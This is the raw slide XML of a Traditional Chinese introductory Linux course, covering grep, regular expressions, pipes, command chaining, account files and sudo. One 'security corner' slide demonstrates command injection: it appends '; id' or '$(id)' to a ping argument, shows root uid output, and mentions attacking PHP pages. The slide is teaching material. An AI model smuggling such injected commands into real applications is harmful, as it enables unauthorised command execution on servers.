              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的正規則表達式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84951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DC6A1C7E-CC52-4B83-A199-C6C6EDE43B7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6125"/>
            <a:ext cx="4960937" cy="3722688"/>
          </a:xfrm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7218"/>
            <a:ext cx="4984750" cy="444618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各位同學，接下來有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35</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>小時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的課程，跟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>各位講授資訊作業專長班</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" smtClean="0">
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>LINUX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作業系統概論操作的課程，請同學專注聽講。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
              <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1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授課大綱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1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一、作業系統介紹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二、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Linux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系統介紹及使用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三、檔案權限與目錄配置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四、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Linux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檔案與目錄管理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五、檔案系統特性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六、檔案的壓縮、解壓縮與打包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七、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Vim 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文書編輯軟體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八、正規表示法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九、帳號管理與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ACL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權限設定</a:t>
            </a:r>
          </a:p>
          <a:p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十、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>常用網路指令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0458192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列出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>dmesg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>核心訊息，再給</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>處理搜尋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>eth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>編行數及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>--color=auto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>顏色顯示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>dmesg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -n --color=auto 'eth' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p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'^$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'so$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--color=auto 'Server*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pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> grep -n --color=auto 'ServerName' /etc/httpd/conf/httpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> grep -n --color=auto 'Server[N,A,R]' /etc/httpd/conf/httpd.conf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0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970486"/>
      </p:ext>
    </p:extLst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--color=auto 'Di......y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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> --color=auto '^[A,K]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es-ES" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>grep -nv --color=auto '[r,k]ee' /etc/httpd/conf/httpd.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>grep -n --color=auto 'Error' /etc/httpd/conf/httpd.conf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0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80884685"/>
      </p:ext>
    </p:extLst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--color=auto ‘html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rep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -n --color=auto ‘Allow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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -n ‘html$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rep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> --color=auto '^[A]'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onf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httpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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0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0974499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"|" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Pipline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>管道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>將前一個指令的標準輸出作為下一個指令的標準輸入來處理！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語法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: A | B (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令的結果 導到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令中後，進行輸出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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0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3810981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b="0" i="0" u="none" strike="noStrike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mesg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| </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" u="none" strike="noStrike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rep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-n -</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" u="none" strike="noStrike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</a:t>
            </a:r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eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" u="none" strike="noStrike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671:[    4.334926] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready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0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63719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smtClean="0"/>
              <a:t>“;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> 用法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>連續下多個指令分號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 smtClean="0"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t> ~]# command1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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>command2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>“&amp;&amp;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> 用法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>第一個指令成功後，才可執行第二個指令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 smtClean="0"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t> ~]# command1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&amp;&amp;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3000" dirty="0" smtClean="0"/>
              <a:t>command2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>“||”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> 用法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>第一個指令失敗後，仍可執行第二個指令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 smtClean="0"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t> ~]# command1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||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3000" dirty="0" smtClean="0"/>
              <a:t>command2</a:t>
            </a:r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1590211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3400" dirty="0" smtClean="0"/>
              <a:t>指令下達分號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>用法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r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 smtClean="0"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t> ~]# command1 ; command2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" b="1" dirty="0" smtClean="0"/>
              <a:t>資安小天地惡意指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Command Injection(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>注射攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> ~]# ping –c [IP address] ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> id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linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ~]# ping –c [IP address] ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>“$(id)”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linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ~]# ping –5 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>“$(id)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ping: unknown host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>=0(root) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>=0(root) group=0(root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>展開出執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>運用在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>網頁上做滲透攻擊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0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1255434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九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帳號管理與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ACL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權限設定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86375002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每個帳號均有自己的家目錄與及其他帳號相關的操作環境之設定</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三種身份：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案權限相關性很高</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設定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</a:t>
            </a:r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group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9218911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group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd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shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>關聯圖</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="140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73148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2290726"/>
      </p:ext>
    </p:extLst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用戶獨一無二的身份標識</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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用戶名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b="1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D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超級用戶		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0</a:t>
            </a:r>
          </a:p>
          <a:p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系統標準用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="1400" kern="120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	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" kern="120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~999</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US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普通用戶		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000~65535</a:t>
            </a:r>
          </a:p>
          <a:p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外部應用程序用戶	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65535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以後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216104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zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：用戶群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-GB" sz="14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2040834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zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-GB" dirty="0" smtClean="0"/>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>訊息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-GB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9076757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將身分切換成管理者或使用者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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u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以進行任何身分的切換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u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使用者帳號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l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後面接的是切換使用者帳號名稱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3379021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指令用來取得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>或是其他帳號的權限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> [-b][-u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>新使用者帳號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>參數</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：將後續的指令放到背景中讓系統自動執行，而不與目前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>產生影響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u:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>後面可以接欲切換的使用者，若無此項則代表切換身分為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>roo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3379021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指令的執行只需要自己的密碼就可以做登入，並非所有人員都可以執行</a:t>
            </a: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必須將使用者加入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sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>裡。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400" dirty="0" smtClean="0"/>
              <a:t>不建議使用</a:t>
            </a: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與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a: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與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>放在一起使用，藉由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>取得一個新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>，而且不用輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>密碼</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>，也就等同於直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>帳號的意思，其實不太安全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4104803"/>
      </p:ext>
    </p:extLst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TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>預設僅有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能使用，流程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smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>當使用者執行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指令時，系統於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udoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案中搜尋該使用者是否有執行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的權限。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若使用者可執行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的權限後，便讓使用者「輸入使用者自己的密碼」來確認。</a:t>
            </a:r>
